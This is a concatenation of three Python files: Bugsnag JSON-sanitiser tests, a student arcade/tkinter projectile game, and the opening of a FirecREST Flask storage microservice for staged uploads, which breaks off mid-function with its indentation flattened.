def tearDown(self):
super(TestUtils, self).tearDown()
def test_encode_filters(self):
data = FilterDict({"credit_card": "123213213123", "password": "456",
"cake": True})
encoder = SanitizingJSONEncoder(keyword_filters=["credit_card",
"password"])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data, {"credit_card": "[FILTERED]",
"password": "[FILTERED]",
"cake": True})
def test_sanitize_list(self):
data = FilterDict({"list": ["carrots", "apples", "peas"],
"passwords": ["abc", "def"]})
encoder = SanitizingJSONEncoder(keyword_filters=["credit_card",
"passwords"])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data, {"list": ["carrots", "apples", "peas"],
"passwords": "[FILTERED]"})
def test_sanitize_valid_unicode_object(self):
data = {"item": '\U0001f62c'}
encoder = SanitizingJSONEncoder(keyword_filters=[])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data, data)
def test_sanitize_nested_object_filters(self):
data = FilterDict({"metadata": {"another_password": "My password"}})
encoder = SanitizingJSONEncoder(keyword_filters=["password"])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data,
{"metadata": {"another_password": "[FILTERED]"}})
def test_sanitize_bad_utf8_object(self):
data = {"bad_utf8": "test \xe9"}
encoder = SanitizingJSONEncoder(keyword_filters=[])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data, data)
def test_sanitize_unencoded_object(self):
data = {"exc": Exception()}
encoder = SanitizingJSONEncoder(keyword_filters=[])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data, {"exc": ""})
def test_json_encode(self):
payload = {"a": "a" * 512 * 1024}
expected = {"a": "a" * 1024}
encoder = SanitizingJSONEncoder(keyword_filters=[])
self.assertEqual(json.loads(encoder.encode(payload)), expected)
def test_filter_dict(self):
data = FilterDict({"metadata": {"another_password": "My password"}})
encoder = SanitizingJSONEncoder(keyword_filters=["password"])
sane_data = encoder.filter_string_values(data)
self.assertEqual(sane_data,
{"metadata": {"another_password": "[FILTERED]"}})
def test_decode_bytes(self):
data = FilterDict({b"metadata": "value"})
encoder = SanitizingJSONEncoder(keyword_filters=["password"])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data, {"metadata": "value"})
def test_unfiltered_encode(self):
data = {"metadata": {"another_password": "My password"}}
encoder = SanitizingJSONEncoder(keyword_filters=["password"])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data, data)
def test_thread_context_vars_get_raises_if_no_default(self):
token = ThreadContextVar(str(uuid.uuid4()))
self.assertRaises(LookupError, token.get)
def test_thread_context_vars_returns_default_value_from_get(self):
token = ThreadContextVar(str(uuid.uuid4()), default={'pips': 3})
self.assertEqual({'pips': 3}, token.get())
def test_thread_context_vars_set_new_value_with_no_default(self):
token = ThreadContextVar(str(uuid.uuid4()))
token.set({'peas': 'maybe'})
self.assertEqual({'peas': 'maybe'}, token.get())
def test_thread_context_vars_set_new_value(self):
token = ThreadContextVar(str(uuid.uuid4()), default={'pips': 3})
token.set({'carrots': 'no'})
self.assertEqual({'carrots': 'no'}, token.get())
def test_thread_context_vars_in_thread(self):
"""
Verify that ThreadContextVar backport has correct behavior
inside a new thread.
"""
token = ThreadContextVar(str(uuid.uuid4()), default={'pips': 3})
token.set({'pips': 4})
def thread_worker():
try:
thread.exc_info = None
result = token.get()
# Test that we got a new, unmodified copy of the default
self.assertEqual({'pips': 3}, result)
result['pips'] = 5
# Test that local modifications are persistent
self.assertEqual({'pips': 5}, token.get())
except Exception:
import sys
thread.exc_info = sys.exc_info()
thread = threading.Thread(target=thread_worker)
thread.start()
thread.join()
# ensure exceptions in the thread_worker fail the test
self.assertEqual(None, thread.exc_info, thread.exc_info)
# Test that non-local changes don't leak through
self.assertEqual({'pips': 4}, token.get())
def test_encoding_recursive(self):
"""
Test that recursive data structures are replaced with '[RECURSIVE]'
"""
data = {"Test": ["a", "b", "c"]}
data["Self"] = data
encoder = SanitizingJSONEncoder(keyword_filters=[])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data,
{"Test": ["a", "b", "c"], "Self": "[RECURSIVE]"})
def test_encoding_recursive_repeated(self):
"""
Test that encoding the same object twice produces the same result
"""
data = {"Test": ["a", "b", "c"]}
data["Self"] = data
encoder = SanitizingJSONEncoder(keyword_filters=[])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data,
{"Test": ["a", "b", "c"], "Self": "[RECURSIVE]"})
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data,
{"Test": ["a", "b", "c"], "Self": "[RECURSIVE]"})
def test_encoding_nested_repeated(self):
"""
Test that encoding the same object within a new object is not
incorrectly marked as recursive
"""
encoder = SanitizingJSONEncoder(keyword_filters=[])
data = {"Test": ["a", "b", "c"]}
encoder.encode(data)
data = {"Previous": data, "Other": 400}
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data,
{"Other": 400,
"Previous": {"Test": ["a", "b", "c"]}})
def test_encoding_oversized_recursive(self):
"""
Test that encoding an object which requires trimming clips recursion
correctly
"""
data = {"Test": ["a" * 128 * 1024, "b", "c"], "Other": {"a": 300}}
data["Self"] = data
encoder = SanitizingJSONEncoder(keyword_filters=[])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data,
{"Test": ["a" * 1024, "b", "c"],
"Self": "[RECURSIVE]",
"Other": {"a": 300}})
def test_encoding_time(self):
"""
Test that encoding a large object is sufficiently speedy
"""
setup = """\
import json
from tests.large_object import large_object_file_path
from bugsnag.utils import SanitizingJSONEncoder
encoder = SanitizingJSONEncoder(keyword_filters=[])
with open(large_object_file_path()) as json_data:
data = json.load(json_data)
"""
stmt = """\
encoder.encode(data)
"""
time = timeit.timeit(stmt=stmt, setup=setup, number=1000)
maximum_time = 6
if sys.version_info[0:2] <= (2, 6):
# json encoding is very slow on python 2.6 so we need to increase
# the allowable time when running on it
maximum_time = 18
self.assertTrue(time < maximum_time,
"Encoding required {0}s (expected {1}s)".format(
time, maximum_time
))
def test_filter_string_values_list_handling(self):
"""
Test that filter_string_values can accept a list for the ignored
parameter for backwards compatibility
"""
data = {}
encoder = SanitizingJSONEncoder()
# no assert as we are just expecting this not to throw
encoder.filter_string_values(data, ['password'])
def test_sanitize_list_handling(self):
"""
Test that _sanitize can accept a list for the ignored parameter for
backwards compatibility
"""
data = {}
encoder = SanitizingJSONEncoder()
# no assert as we are just expecting this not to throw
encoder._sanitize(data, ['password'], ['password'])
def test_json_encode_invalid_keys(self):
"""
Test that _sanitize can accept some invalid json where a function
name or some other bad data is passed as a key in the payload
dictionary.
"""
encoder = SanitizingJSONEncoder(keyword_filters=[])
def foo():
return "123"
result = json.loads(encoder.encode({foo: "a"}))
self.assertTrue(re.match(r'<function.*foo.*',
list(result.keys())[0]) is not None)
self.assertEqual(list(result.values()), ["a"])
now = datetime.datetime.now()
result = json.loads(encoder.encode({now: "a"}))
self.assertEqual(list(result.keys())[0], str(now))
self.assertEqual(list(result.values()), ["a"])
class Object(object):
pass
result = json.loads(encoder.encode({Object(): "a"}))
self.assertTrue(re.match(r'<tests.test_utils.*Object.*',
list(result.keys())[0]) is not None)
self.assertEqual(list(result.values()), ["a"])
def test_filter_dict_with_inner_dict(self):
"""
Test that nested dict uniqueness checks work and are not recycled
when a reference to a nested dict goes out of scope
"""
data = {
'level1-key1': {
'level2-key1': FilterDict({
'level3-key1': {'level4-key1': 'level4-value1'},
'level3-key4': {'level4-key3': 'level4-value3'},
}),
'level2-key2': FilterDict({
'level3-key2': 'level3-value1',
'level3-key3': {'level4-key2': 'level4-value2'},
'level3-key5': {'level4-key4': 'level4-value4'},
}),
}
}
encoder = SanitizingJSONEncoder(keyword_filters=['password'])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data, {
'level1-key1': {
'level2-key1': {
'level3-key1': {
'level4-key1': 'level4-value1'
},
'level3-key4': {
'level4-key3': 'level4-value3'
}
},
'level2-key2': {
'level3-key2': 'level3-value1',
'level3-key3': {
'level4-key2': 'level4-value2'
},
'level3-key5': {
'level4-key4': 'level4-value4'
},
},
}
})
def test_filter_strings_with_inner_dict(self):
"""
Test that nested dict uniqueness checks work and are not recycled
when a reference to a nested dict goes out of scope
"""
data = FilterDict({
'level1-key1': {
'level2-key1': {
'level3-key1': {'level4-key1': 'level4-value1'},
'token': 'mypassword',
},
'level2-key2': {
'level3-key3': {'level4-key2': 'level4-value2'},
'level3-key4': {'level4-key3': 'level4-value3'},
'level3-key5': {'password': 'super-secret'},
'level3-key6': {'level4-key4': 'level4-value4'},
'level3-key7': {'level4-key4': 'level4-value4'},
'level3-key8': {'level4-key4': 'level4-value4'},
'level3-key9': {'level4-key4': 'level4-value4'},
'level3-key0': {'level4-key4': 'level4-value4'},
},
}
})
encoder = SanitizingJSONEncoder(keyword_filters=['password', 'token'])
filtered_data = encoder.filter_string_values(data)
self.assertEqual(filtered_data, {
'level1-key1': {
'level2-key1': {
'level3-key1': {
'level4-key1': 'level4-value1'
},
'token': '[FILTERED]'
},
'level2-key2': {
'level3-key3': {
'level4-key2': 'level4-value2'
},
'level3-key4': {
'level4-key3': 'level4-value3'
},
'level3-key5': {
'password': '[FILTERED]'
},
'level3-key6': {
'level4-key4': 'level4-value4'
},
'level3-key7': {
'level4-key4': 'level4-value4'
},
'level3-key8': {
'level4-key4': 'level4-value4'
},
'level3-key9': {
'level4-key4': 'level4-value4'
},
'level3-key0': {
'level4-key4': 'level4-value4'
},
},
}
})
def test_parse_invalid_content_type(self):
info = parse_content_type('invalid-type')
self.assertEqual(('invalid-type', None, None, None), info)
def test_parse_invalid_content_type_params(self):
info = parse_content_type('invalid-type;schema=http://example.com/b')
self.assertEqual(('invalid-type', None, None,
'schema=http://example.com/b'), info)
def test_parse_parameters(self):
info = parse_content_type('text/plain;charset=utf-32')
self.assertEqual(('text', 'plain', None, 'charset=utf-32'), info)
def test_parse_suffix(self):
info = parse_content_type('application/hal+json;charset=utf-8')
self.assertEqual(('application', 'hal', 'json', 'charset=utf-8'), info)
def test_json_content_type(self):
self.assertTrue(is_json_content_type('application/json'))
self.assertTrue(is_json_content_type('application/hal+json'))
self.assertTrue(is_json_content_type('application/other+json'))
self.assertTrue(is_json_content_type(
'application/schema+json;schema=http://example.com/schema-2'))
self.assertTrue(is_json_content_type('application/json;charset=utf-8'))
self.assertFalse(is_json_content_type('text/json'))
self.assertFalse(is_json_content_type('text/plain'))
self.assertFalse(is_json_content_type('json'))
self.assertFalse(is_json_content_type('application/jsonfoo'))
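# Quick illustrative sketch, mirroring the assertions above, of using the
# encoder directly outside a TestCase; the filter list and sample payload are
# arbitrary.
def _sanitizer_sketch():
    encoder = SanitizingJSONEncoder(keyword_filters=["password"])
    payload = FilterDict({"user": "alice", "password": "hunter2"})
    # -> {"user": "alice", "password": "[FILTERED]"}
    return json.loads(encoder.encode(payload))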
|
test.py
|
#imports
import arcade
import random
import math
import os
import timeit
import threading
import time
from tkinter import *
from tkinter.ttk import *
import tkinter as tk
# Set up the constants
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
SCREEN_GAME_Height = 300
SCREEN_GAME_Width = 400
SCREEN_TITLE = "CS 230 Final Project!"
SQUARE_LENGTH = 20
NUMBER_OF_SHAPES = 1
lastChoice = "Right"
class Shape:
def __init__(self, x, y, width, height, angle, delta_x, delta_y,
delta_angle, color):
self.x = x
self.y = y
self.width = width
self.height = height
self.angle = angle
self.delta_x = delta_x
self.delta_y = delta_y
self.delta_angle = delta_angle
self.color = color
def move(self):
self.x += self.delta_x
self.y += self.delta_y
self.angle += self.delta_angle
class Ellipse(Shape):
def draw(self):
arcade.draw_ellipse_filled(self.x, self.y, self.width, self.height,
self.color, self.angle)
class Rectangle(Shape):
def draw(self):
arcade.draw_rectangle_filled(self.x, self.y, self.width, self.height,
self.color, self.angle)
class RectangleOutline(Shape):
def draw(self):
arcade.draw_rectangle_outline(self.x, self.y, self.width, self.height,
self.color, 3)
class Line(Shape):
def draw(self):
newX = 25 * math.cos(self.angle * math.pi / 180)
newY = 25 * math.sin(self.angle * math.pi / 180)
arcade.draw_line(self.x, self.y, self.x + newX, self.y + newY, self.color, 3)
arcade.draw_ellipse_filled(self.x + newX, self.y + newY, 10, 10, self.color, 3)
class MyGame(arcade.Window):
""" Main application class. """
def __init__(self):
super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)
file_path = os.path.join(os.path.dirname(__file__))
os.chdir(file_path)
self.shape_list = None
arcade.set_background_color(arcade.color.BOLE)
self.size = 100
self.isRunning = False
def setup(self):
""" Set up the game and initialize the variables. """
self.shape_list = []
x = random.randrange(SQUARE_LENGTH, SCREEN_WIDTH - SQUARE_LENGTH)
y = SQUARE_LENGTH / 2
base = Rectangle(x, y, SQUARE_LENGTH, SQUARE_LENGTH, 0, 0, 0, 0, arcade.color.YELLOW)
self.shape_list.append(base)
line = Line(x, y, 0, 0, 0, 0, 0, 0, arcade.color.BLACK)
self.shape_list.append(line)
if(x > SCREEN_WIDTH - x):
self.targetX = random.randrange(int(self.size / 2), int(x - SQUARE_LENGTH - self.size / 2))
else:
self.targetX = random.randrange(int(x + SQUARE_LENGTH + self.size / 2), int(SCREEN_WIDTH - self.size / 2))
targetY = self.size / 2
zone = RectangleOutline(self.targetX, targetY, self.size, self.size, 0, 0, 0, 0, arcade.color.RED)
self.shape_list.append(zone)
def update_line(self, linVel, angVel):
line = self.shape_list[1]
line.angle = angVel
self.linearVelocity = linVel
def reflect_line(self):
global lastChoice
line = self.shape_list[1]
while line.angle < 0:
line.angle = line.angle + 360
angle = line.angle % 360
if lastChoice == "Left" and (angle <= 90 or angle >= 270):
line.angle = (line.angle + 180)
if lastChoice == "Right" and (angle >= 90 and angle <= 270):
line.angle = (line.angle + 180)
#line.angle = -1 * line.angle
def simulate_ball(self):
self.isRunning = True
self.t = 0
self.oldX = self.shape_list[0].x
self.oldY = self.shape_list[0].y
def on_draw(self):
"""
Render the screen.
"""
arcade.start_render()
for shape in self.shape_list:
if(self.isRunning == True):
angle = self.shape_list[1].angle * math.pi / 180
self.shape_list[0].x = self.linearVelocity * math.cos(angle) * self.t + self.shape_list[1].x
self.shape_list[0].y = -16*self.t*self.t + (self.linearVelocity * math.sin(angle) * self.t) + SQUARE_LENGTH
self.t = self.t + 0.01
if(self.shape_list[0].y <= 5):
if(self.shape_list[0].x >= self.targetX + SQUARE_LENGTH / 2 - self.size / 2 and self.shape_list[0].x <= self.targetX - SQUARE_LENGTH / 2 + self.size / 2):
self.size = int(math.floor(self.size * 0.9))
self.setup()
else:
self.shape_list[0].x = self.oldX
self.shape_list[0].y = self.oldY
self.isRunning = False
if(self.isRunning == False or not isinstance(shape, Line)):
shape.draw()
def selectOption():
global angVelRButton, gameWindow, lastChoice
if(angVelRButton.get() != "" and angVelRButton.get() != lastChoice):
lastChoice = angVelRButton.get()
gameWindow.reflect_line()
def onPlayClick():
global gameWindow
gameWindow.simulate_ball()
def onChange(evt):
global linVelEntry, angVelEntry, gameWindow
if(linVelEntry.get() == '' or not linVelEntry.get().lstrip('-').isdigit()):
linVel = 0
else:
linVel = int(linVelEntry.get())
if(angVelEntry.get() == '' or not angVelEntry.get().lstrip('-').isdigit()):
ang = 0
else:
ang = int(angVelEntry.get())
gameWindow.update_line(linVel, ang)
def onExitClick():
global buttonWindow, gameWindow
buttonWindow.destroy()
arcade.close_window()
def createWindow(app):
global angVelRButton, linVelEntry, angVelEntry
app.columnconfigure(5)
lengths = [2, 15, 1, 15, 2]
for i in range(0,len(lengths)):
Label(app, text=' ', width=lengths[i]).grid(row=0, column=i)
Label(app, text='Starting Linear Velocity:').grid(row=1, column=1)
linVelEntry = Entry(app)
linVelEntry.grid(row=1, column=3)
linVelEntry.bind("<KeyRelease>", onChange)
for i in range(0,len(lengths)):
Label(app, text=' ', width=lengths[i]).grid(row=2, column=i)
Label(app, text='Starting Angle:').grid(row=3, column=1)
angVelEntry = Entry(app)
angVelEntry.grid(row=3, column=3)
angVelEntry.bind("<KeyRelease>", onChange)
for i in range(0,len(lengths)):
Label(app, text=' ', width=lengths[i]).grid(row=4, column=i)
Label(app, text='Velocity Direction:').grid(row=5, column=1)
Types = ["Left", "Right"]
angVelRButton = StringVar()
for i in range(0,len(Types)):
text = Types[i]
Radiobutton(app, text=text, variable=angVelRButton, value=text, command=selectOption).grid(row=6, column=2*i+1)
for i in range(0,len(lengths)):
Label(app, text=' ', width=lengths[i]).grid(row=7, column=i)
playButton = Button(app, text='Play', command=onPlayClick)
playButton.grid(row=8, column=1)
closeButton = Button(app, text='Exit', command=onExitClick)
closeButton.grid(row=8, column=3)
app.geometry("320x200")
app.mainloop()
def handleWindow():
global buttonWindow
buttonWindow = tk.Tk(className='CS 230 Final Project')
createWindow(buttonWindow)
def main():
global gameWindow
buttonWindow = threading.Thread(target=handleWindow)
buttonWindow.start()
gameWindow = MyGame()
gameWindow.setup()
arcade.run()
if __name__ == "__main__":
main()
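# Helper sketch (not wired into the game) that isolates the projectile-motion
# update used in MyGame.on_draw: x = v*cos(a)*t + x0 and
# y = -16*t**2 + v*sin(a)*t + y0, where on_draw uses y0 = SQUARE_LENGTH and
# the angle is given in degrees.
def projectile_position(x0, y0, velocity, angle_degrees, t):
    angle = math.radians(angle_degrees)
    x = velocity * math.cos(angle) * t + x0
    y = -16 * t * t + velocity * math.sin(angle) * t + y0
    return x, y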
|
storage.py
|
#
# Copyright (c) 2019-2021, ETH Zurich. All rights reserved.
#
# Please, refer to the LICENSE file in the root directory.
# SPDX-License-Identifier: BSD-3-Clause
#
from flask import Flask, request, jsonify, g
import json, tempfile, os
import urllib
import datetime
import async_task
import threading
# logging handler
from logging.handlers import TimedRotatingFileHandler
# common functions
from cscs_api_common import check_auth_header, get_username
from cscs_api_common import create_task, update_task, get_task_status
from cscs_api_common import exec_remote_command
from cscs_api_common import create_certificate
from cscs_api_common import in_str
from cscs_api_common import is_valid_file, is_valid_dir, check_command_error, get_boolean_var, validate_input, LogRequestFormatter
# job_time_checker for correct SLURM job time in /xfer-internal tasks
import job_time
# for debug purposes
import logging
import requests
from hashlib import md5
import stat
from cryptography.fernet import Fernet
import time
from flask_opentracing import FlaskTracing
from jaeger_client import Config
import opentracing
## READING environment vars
CERTIFICATOR_URL = os.environ.get("F7T_CERTIFICATOR_URL")
TASKS_URL = os.environ.get("F7T_TASKS_URL")
COMPUTE_URL = os.environ.get("F7T_COMPUTE_URL")
KONG_URL = os.environ.get("F7T_KONG_URL")
STORAGE_PORT = os.environ.get("F7T_STORAGE_PORT", 5000)
AUTH_HEADER_NAME = 'Authorization'
# Machines for Storage:
# Filesystem DNS or IP where to download or upload files:
SYSTEMS_INTERNAL_STORAGE = os.environ.get("F7T_SYSTEMS_INTERNAL_STORAGE").strip('\'"')
# Job machine where to send xfer-internal jobs (must be defined in SYSTEMS_PUBLIC)
STORAGE_JOBS_MACHINE = os.environ.get("F7T_STORAGE_JOBS_MACHINE").strip('\'"')
# SYSTEMS_PUBLIC: list of allowed systems
# remove quotes and split into array
SYSTEMS_PUBLIC = os.environ.get("F7T_SYSTEMS_PUBLIC").strip('\'"').split(";")
# internal machines to submit/query jobs
SYS_INTERNALS = os.environ.get("F7T_SYSTEMS_INTERNAL_COMPUTE").strip('\'"').split(";")
# internal machines for small operations
SYS_INTERNALS_UTILITIES = os.environ.get("F7T_SYSTEMS_INTERNAL_UTILITIES").strip('\'"').split(";")
###### ENV VAR FOR DETECT TECHNOLOGY OF STAGING AREA:
OBJECT_STORAGE = os.environ.get("F7T_OBJECT_STORAGE", "").strip('\'"')
# Scheduler partition used for internal transfers
XFER_PARTITION = os.environ.get("F7T_XFER_PARTITION", "").strip('\'"')
# --account parameter needed in sbatch?
USE_SLURM_ACCOUNT = get_boolean_var(os.environ.get("F7T_USE_SLURM_ACCOUNT", False))
# Machine used for external transfers
EXT_TRANSFER_MACHINE_PUBLIC=os.environ.get("F7T_EXT_TRANSFER_MACHINE_PUBLIC", "").strip('\'"')
EXT_TRANSFER_MACHINE_INTERNAL=os.environ.get("F7T_EXT_TRANSFER_MACHINE_INTERNAL", "").strip('\'"')
OS_AUTH_URL = os.environ.get("F7T_OS_AUTH_URL")
OS_IDENTITY_PROVIDER = os.environ.get("F7T_OS_IDENTITY_PROVIDER")
OS_IDENTITY_PROVIDER_URL= os.environ.get("F7T_OS_IDENTITY_PROVIDER_URL")
OS_PROTOCOL = os.environ.get("F7T_OS_PROTOCOL")
OS_INTERFACE = os.environ.get("F7T_OS_INTERFACE")
OS_PROJECT_ID = os.environ.get("F7T_OS_PROJECT_ID")
# SECRET KEY for temp url without using Token
SECRET_KEY = os.environ.get("F7T_SECRET_KEY")
# Expiration time for temp URLs in seconds, by default 30 days
STORAGE_TEMPURL_EXP_TIME = int(os.environ.get("F7T_STORAGE_TEMPURL_EXP_TIME", "2592000").strip('\'"'))
# max file size for temp URLs in MegaBytes, by default 5120 MB = 5 GB
STORAGE_MAX_FILE_SIZE = int(os.environ.get("F7T_STORAGE_MAX_FILE_SIZE", "5120").strip('\'"'))
# for use on signature of URL it must be in bytes (MB*1024*1024 = Bytes)
STORAGE_MAX_FILE_SIZE *= 1024*1024
UTILITIES_TIMEOUT = int(os.environ.get("F7T_UTILITIES_TIMEOUT", "5").strip('\'"'))
STORAGE_POLLING_INTERVAL = int(os.environ.get("F7T_STORAGE_POLLING_INTERVAL", "60").strip('\'"'))
CERT_CIPHER_KEY = os.environ.get("F7T_CERT_CIPHER_KEY", "").strip('\'"').encode('utf-8')
### SSL parameters
USE_SSL = get_boolean_var(os.environ.get("F7T_USE_SSL", False))
SSL_CRT = os.environ.get("F7T_SSL_CRT", "")
SSL_KEY = os.environ.get("F7T_SSL_KEY", "")
# verify signed SSL certificates
SSL_SIGNED = get_boolean_var(os.environ.get("F7T_SSL_SIGNED", False))
TRACER_HEADER = "uber-trace-id"
# asynchronous tasks: upload & download --> http://TASKS_URL
# {task_id : AsyncTask}
storage_tasks = {}
# relationship between upload task and filesystem
# {hash_id : {'user':user,'system':system,'target':path,'source':fileName,'status':status_code, 'hash_id':task_id, 'trace_id':trace_id}}
uploaded_files = {}
# debug on console
debug = get_boolean_var(os.environ.get("F7T_DEBUG_MODE", False))
app = Flask(__name__)
JAEGER_AGENT = os.environ.get("F7T_JAEGER_AGENT", "").strip('\'"')
if JAEGER_AGENT != "":
config = Config(
config={'sampler': {'type': 'const', 'param': 1 },
'local_agent': {'reporting_host': JAEGER_AGENT, 'reporting_port': 6831 },
'logging': True,
'reporter_batch_size': 1},
service_name = "storage")
jaeger_tracer = config.initialize_tracer()
tracing = FlaskTracing(jaeger_tracer, True, app)
else:
jaeger_tracer = None
tracing = None
def get_tracing_headers(req):
"""
receives a Flask request object; returns headers suitable for RPC calls and an ID for logging
"""
new_headers = {}
if JAEGER_AGENT != "":
try:
jaeger_tracer.inject(tracing.get_span(req), opentracing.Format.TEXT_MAP, new_headers)
except Exception as e:
app.logger.error(e)
new_headers[AUTH_HEADER_NAME] = req.headers[AUTH_HEADER_NAME]
ID = new_headers.get(TRACER_HEADER, '')
return new_headers, ID
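# Sketch (never called) of the pattern the route handlers below follow: fetch
# the propagation headers plus trace ID once per request, then hand the
# headers to downstream helpers such as update_task. task_id is a placeholder
# argument here.
def _tracing_usage_sketch(req, task_id):
    [headers, ID] = get_tracing_headers(req)
    app.logger.info(f"[{ID}] updating task {task_id}")
    update_task(task_id, headers, async_task.ST_UPL_BEG)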
def file_to_str(fileName):
str_file = ""
try:
fileObj = open(fileName,"r")
str_file = fileObj.read()
fileObj.close()
return str_file
except IOError as e:
app.logger.error(e)
return ""
def str_to_file(str_file,dir_name,file_name):
try:
if not os.path.exists(dir_name):
app.logger.info(f"Created temp directory for certs in {dir_name}")
os.makedirs(dir_name)
file_str = open(f"{dir_name}/{file_name}","w")
file_str.write(str_file)
file_str.close()
app.logger.info(f"File written in {dir_name}/{file_name}")
except IOError as e:
app.logger.error("Couldn't write file {dir_name}/{file_name}")
app.logger.error(e)
def os_to_fs(task_id):
upl_file = uploaded_files[task_id]
system_name = upl_file["system_name"]
system_addr = upl_file["system_addr"]
username = upl_file["user"]
objectname = upl_file["source"]
headers = {}
headers[TRACER_HEADER] = upl_file['trace_id']
try:
app.logger.info(upl_file["msg"])
# certificate is encrypted with CERT_CIPHER_KEY key
# here is decrypted
cert = upl_file["msg"]["cert"]
cipher = Fernet(CERT_CIPHER_KEY)
# the decryption process produces a byte type
# remember that is stored as str not as byte in the JSON
pub_cert = cipher.decrypt(cert[0].encode('utf-8')).decode('utf-8')
# cert_pub in 0 /user-key-cert.pub
# temp-dir in 1
# get tmp directory
td = cert[1]
app.logger.info(f"Temp dir: {td}")
if not os.path.exists(td):
# retrieve public certificate and store in temp dir location
str_to_file(pub_cert,td,"user-key-cert.pub")
# user public and private key should be in Storage / path, symlinking in order to not use the same key at the same time
os.symlink(os.getcwd() + "/user-key.pub", td + "/user-key.pub") # link on temp dir
os.symlink(os.getcwd() + "/user-key", td + "/user-key") # link on temp dir
# stat.S_IRUSR -> owner has read permission
os.chmod(td + "/user-key-cert.pub", stat.S_IRUSR)
cert_list = [f"{td}/user-key-cert.pub", f"{td}/user-key.pub", f"{td}/user-key", td]
# start download from OS to FS
update_task(task_id, headers, async_task.ST_DWN_BEG)
# execute download
result = exec_remote_command(username, system_name, system_addr, "", "storage_cert", cert_list)
# if no error, then download is complete
if result["error"] == 0:
update_task(task_id, headers, async_task.ST_DWN_END)
# No need to delete the dictionary, it will be cleaned on next iteration
# delete upload request
# del uploaded_files[task_id]
# must be deleted after object is moved to storage
# staging.delete_object(containername=username,prefix=task_id,objectname=objectname)
# for big files delete_object consumes a long time and often gives a TimeOut error between system and staging area
# Therefore, delete_object_after (here set to 10 minutes) triggers the staging area's internal
# mechanism to delete the file automatically, without needing an open connection
staging.delete_object_after(containername=username,prefix=task_id,objectname=objectname, ttl = int(time.time())+600)
else:
# if error, should be prepared for try again
upl_file["status"] = async_task.ST_DWN_ERR
uploaded_files[task_id] = upl_file
# update, but preserve "msg" as the data for the download to OS, to be used for a retry in the next iteration
update_task(task_id, headers, async_task.ST_DWN_ERR, msg=upl_file, is_json=True)
except Exception as e:
app.logger.error(e)
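# The certificate handling above relies on symmetric Fernet encryption: the
# certificate is stored encrypted with CERT_CIPHER_KEY and only decrypted
# right before being written to the temp dir. Self-contained round trip as a
# sketch (the key below is freshly generated, not CERT_CIPHER_KEY):
def _fernet_roundtrip_sketch():
    key = Fernet.generate_key()
    cipher = Fernet(key)
    token = cipher.encrypt(b"ssh-ed25519-cert ... user@host")
    # tokens are bytes; the service stores them as str in JSON, hence the
    # encode()/decode() calls in os_to_fs()
    return cipher.decrypt(token).decode("utf-8")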
# asynchronous check of upload_files to declare which is downloadable to FS
def check_upload_files():
global staging
while True:
# Get updated task status from Tasks microservice DB backend (TaskPersistence)
get_upload_unfinished_tasks()
app.logger.info(f"Check files in Object Storage - Pendings uploads: {len(uploaded_files)}")
# create a STATIC auxiliary upload list in order to avoid "RuntimeError: dictionary changed size during iteration"
# (uploaded_files is shared between threads, and in Python 3 dict.items() is a live view, which triggers that error)
upl_list= [(task_id, upload) for task_id,upload in uploaded_files.items()]
for task_id,upload in upl_list:
#checks if file is ready or not for download to FileSystem
try:
task_status = async_task.status_codes[upload['status']]
headers = {}
app.logger.info(f"Status of {task_id}: {task_status}")
#if upload["status"] in [async_task.ST_URL_REC,async_task.ST_DWN_ERR] :
if upload["status"] == async_task.ST_URL_REC:
app.logger.info(f"Task {task_id} -> File ready to upload or already downloaded")
upl = uploaded_files[task_id]
containername = upl["user"]
prefix = task_id
objectname = upl["source"]
headers[TRACER_HEADER] = upl['trace_id']
if not staging.is_object_created(containername,prefix,objectname):
app.logger.info(f"{containername}/{prefix}/{objectname} isn't created in staging area, continue polling")
continue
# confirms that file is in OS (auth_header is not needed)
update_task(task_id, headers, async_task.ST_UPL_CFM, msg=upload, is_json=True)
upload["status"] = async_task.ST_UPL_CFM
uploaded_files["task_id"] = upload
os_to_fs_task = threading.Thread(target=os_to_fs, name=upl['trace_id'], args=(task_id,))
os_to_fs_task.start()
# if the upload to OS is done but the download to FS failed, then resume
elif upload["status"] == async_task.ST_DWN_ERR:
upl = uploaded_files[task_id]
containername = upl["user"]
prefix = task_id
objectname = upl["source"]
headers[TRACER_HEADER] = upl['trace_id']
# if file has been deleted from OS, then erroneous upload process. Restart.
if not staging.is_object_created(containername,prefix,objectname):
app.logger.info(f"{containername}/{prefix}/{objectname} isn't created in staging area, task marked as erroneous")
update_task(task_id, headers, async_task.ERROR, "File was deleted from staging area. Start a new upload process")
upload["status"] = async_task.ERROR
continue
# if file is still in OS, proceed to new download to FS
update_task(task_id, headers, async_task.ST_DWN_BEG)
upload["status"] = async_task.ST_DWN_BEG
uploaded_files["task_id"] = upload
os_to_fs_task = threading.Thread(target=os_to_fs, name=upl['trace_id'], args=(task_id,))
os_to_fs_task.start()
except Exception as e:
app.logger.error(f"{type(e).__name__}: {e}")
continue
time.sleep(STORAGE_POLLING_INTERVAL)
# async task for download large files
# user: user in the posix file system
# system: system in which the file will be stored (REMOVE later)
# sourcePath: path in FS where the object is
# task_id: async task id given for Tasks microservice
def download_task(headers, system_name, system_addr, sourcePath, task_id):
object_name = sourcePath.split("/")[-1]
global staging
# check if staging area token is valid
if not staging.renew_token():
msg = "Staging area auth error"
update_task(task_id, headers, async_task.ERROR, msg)
return
# create container if it doesn't exist:
container_name = get_username(headers[AUTH_HEADER_NAME])
if not staging.is_container_created(container_name):
errno = staging.create_container(container_name)
if errno == -1:
msg = f"Could not create container {container_name} in Staging Area ({staging.get_object_storage()})"
update_task(task_id, headers, async_task.ERROR, msg)
return
# upload file to swift
object_prefix = task_id
